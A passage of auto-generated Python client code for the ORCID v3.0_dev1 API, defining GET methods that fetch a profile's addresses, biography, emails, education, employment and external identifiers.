>>> thread = api.view_address(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.view_address_with_http_info(orcid, put_code, **kwargs)
else:
(data) = self.view_address_with_http_info(orcid, put_code, **kwargs)
return data
def view_address_with_http_info(self, orcid, put_code, **kwargs):
"""
Fetch an address
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_address_with_http_info(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'put_code']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method view_address" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `view_address`")
# verify the required parameter 'put_code' is set
if ('put_code' not in params) or (params['put_code'] is None):
raise ValueError("Missing the required parameter `put_code` when calling `view_address`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/address/{putCode}'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
if 'put_code' in params:
path_params['putCode'] = params['put_code']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def view_addresses(self, orcid, **kwargs):
"""
Fetch all addresses of a profile
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_addresses(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.view_addresses_with_http_info(orcid, **kwargs)
else:
(data) = self.view_addresses_with_http_info(orcid, **kwargs)
return data
def view_addresses_with_http_info(self, orcid, **kwargs):
"""
Fetch all addresses of a profile
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_addresses_with_http_info(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method view_addresses" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `view_addresses`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/address'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def view_biography(self, orcid, **kwargs):
"""
Get biography details
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_biography(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.view_biography_with_http_info(orcid, **kwargs)
else:
(data) = self.view_biography_with_http_info(orcid, **kwargs)
return data
def view_biography_with_http_info(self, orcid, **kwargs):
"""
Get biography details
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_biography_with_http_info(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method view_biography" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `view_biography`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/biography'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def view_client(self, client_id, **kwargs):
"""
Fetch client details
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_client(client_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str client_id: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.view_client_with_http_info(client_id, **kwargs)
else:
(data) = self.view_client_with_http_info(client_id, **kwargs)
return data
def view_client_with_http_info(self, client_id, **kwargs):
"""
Fetch client details
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_client_with_http_info(client_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str client_id: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['client_id']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method view_client" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'client_id' is set
if ('client_id' not in params) or (params['client_id'] is None):
raise ValueError("Missing the required parameter `client_id` when calling `view_client`")
if 'client_id' in params and not re.search('[^/]+', params['client_id']):
raise ValueError("Invalid value for parameter `client_id` when calling `view_client`, must conform to the pattern `/[^/]+/`")
collection_formats = {}
resource_path = '/v3.0_dev1/client/{client_id}'.replace('{format}', 'json')
path_params = {}
if 'client_id' in params:
path_params['client_id'] = params['client_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def view_education(self, orcid, put_code, **kwargs):
"""
Fetch an Education
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_education(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: Education
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.view_education_with_http_info(orcid, put_code, **kwargs)
else:
(data) = self.view_education_with_http_info(orcid, put_code, **kwargs)
return data
def view_education_with_http_info(self, orcid, put_code, **kwargs):
"""
Fetch an Education
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_education_with_http_info(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: Education
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'put_code']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method view_education" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `view_education`")
# verify the required parameter 'put_code' is set
if ('put_code' not in params) or (params['put_code'] is None):
raise ValueError("Missing the required parameter `put_code` when calling `view_education`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/education/{putCode}'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
if 'put_code' in params:
path_params['putCode'] = params['put_code']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Education',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def view_education_summary(self, orcid, put_code, **kwargs):
"""
Fetch an Education summary
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_education_summary(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: EducationSummary
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.view_education_summary_with_http_info(orcid, put_code, **kwargs)
else:
(data) = self.view_education_summary_with_http_info(orcid, put_code, **kwargs)
return data
def view_education_summary_with_http_info(self, orcid, put_code, **kwargs):
"""
Fetch an Education summary
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_education_summary_with_http_info(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: EducationSummary
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'put_code']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method view_education_summary" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `view_education_summary`")
# verify the required parameter 'put_code' is set
if ('put_code' not in params) or (params['put_code'] is None):
raise ValueError("Missing the required parameter `put_code` when calling `view_education_summary`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/education/summary/{putCode}'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
if 'put_code' in params:
path_params['putCode'] = params['put_code']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='EducationSummary',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def view_educations(self, orcid, **kwargs):
"""
Fetch all educations
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_educations(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:return: Educations
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.view_educations_with_http_info(orcid, **kwargs)
else:
(data) = self.view_educations_with_http_info(orcid, **kwargs)
return data
def view_educations_with_http_info(self, orcid, **kwargs):
"""
Fetch all educations
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_educations_with_http_info(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:return: Educations
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method view_educations" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `view_educations`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/educations'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Educations',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def view_emails(self, orcid, **kwargs):
"""
Fetch all emails for an ORCID ID
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_emails(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.view_emails_with_http_info(orcid, **kwargs)
else:
(data) = self.view_emails_with_http_info(orcid, **kwargs)
return data
def view_emails_with_http_info(self, orcid, **kwargs):
"""
Fetch all emails for an ORCID ID
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_emails_with_http_info(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method view_emails" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `view_emails`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/email'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def view_employment(self, orcid, put_code, **kwargs):
"""
Fetch an Employment
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_employment(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: Employment
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.view_employment_with_http_info(orcid, put_code, **kwargs)
else:
(data) = self.view_employment_with_http_info(orcid, put_code, **kwargs)
return data
def view_employment_with_http_info(self, orcid, put_code, **kwargs):
"""
Fetch an Employment
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_employment_with_http_info(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: Employment
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'put_code']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method view_employment" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `view_employment`")
# verify the required parameter 'put_code' is set
if ('put_code' not in params) or (params['put_code'] is None):
raise ValueError("Missing the required parameter `put_code` when calling `view_employment`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/employment/{putCode}'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
if 'put_code' in params:
path_params['putCode'] = params['put_code']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Employment',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def view_employment_summary(self, orcid, put_code, **kwargs):
"""
Fetch an Employment Summary
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_employment_summary(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: EmploymentSummary
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.view_employment_summary_with_http_info(orcid, put_code, **kwargs)
else:
(data) = self.view_employment_summary_with_http_info(orcid, put_code, **kwargs)
return data
def view_employment_summary_with_http_info(self, orcid, put_code, **kwargs):
"""
Fetch an Employment Summary
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_employment_summary_with_http_info(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: EmploymentSummary
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'put_code']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method view_employment_summary" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `view_employment_summary`")
# verify the required parameter 'put_code' is set
if ('put_code' not in params) or (params['put_code'] is None):
raise ValueError("Missing the required parameter `put_code` when calling `view_employment_summary`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/employment/summary/{putCode}'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
if 'put_code' in params:
path_params['putCode'] = params['put_code']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='EmploymentSummary',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def view_employments(self, orcid, **kwargs):
"""
Fetch all employments
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_employments(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:return: Employments
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.view_employments_with_http_info(orcid, **kwargs)
else:
(data) = self.view_employments_with_http_info(orcid, **kwargs)
return data
def view_employments_with_http_info(self, orcid, **kwargs):
"""
Fetch all employments
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_employments_with_http_info(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:return: Employments
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method view_employments" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `view_employments`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/employments'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/vnd.orcid+xml; qs=5', 'application/orcid+xml; qs=3', 'application/xml', 'application/vnd.orcid+json; qs=4', 'application/orcid+json; qs=2', 'application/json'])
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Employments',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def view_external_identifier(self, orcid, put_code, **kwargs):
"""
Fetch external identifier
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_external_identifier(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.view_external_identifier_with_http_info(orcid, put_code, **kwargs)
else:
(data) = self.view_external_identifier_with_http_info(orcid, put_code, **kwargs)
return data
def view_external_identifier_with_http_info(self, orcid, put_code, **kwargs):
"""
Fetch external identifier
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_external_identifier_with_http_info(orcid, put_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:param str put_code: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orcid', 'put_code']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method view_external_identifier" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'orcid' is set
if ('orcid' not in params) or (params['orcid'] is None):
raise ValueError("Missing the required parameter `orcid` when calling `view_external_identifier`")
# verify the required parameter 'put_code' is set
if ('put_code' not in params) or (params['put_code'] is None):
raise ValueError("Missing the required parameter `put_code` when calling `view_external_identifier`")
collection_formats = {}
resource_path = '/v3.0_dev1/{orcid}/external-identifiers/{putCode}'.replace('{format}', 'json')
path_params = {}
if 'orcid' in params:
path_params['orcid'] = params['orcid']
if 'put_code' in params:
path_params['putCode'] = params['put_code']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['orcid_auth']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def view_external_identifiers(self, orcid, **kwargs):
"""
Fetch external identifiers
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.view_external_identifiers(orcid, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str orcid: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.view_external_identifiers_with_http_info(orcid, **kwargs)
else:
(data) = self.view_external_identifiers_with_http_info(orcid, **kwargs)
return data
def view_external_identifiers_with_http_info(self, orcid, **kwargs):
"""
Fetch external identifiers
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
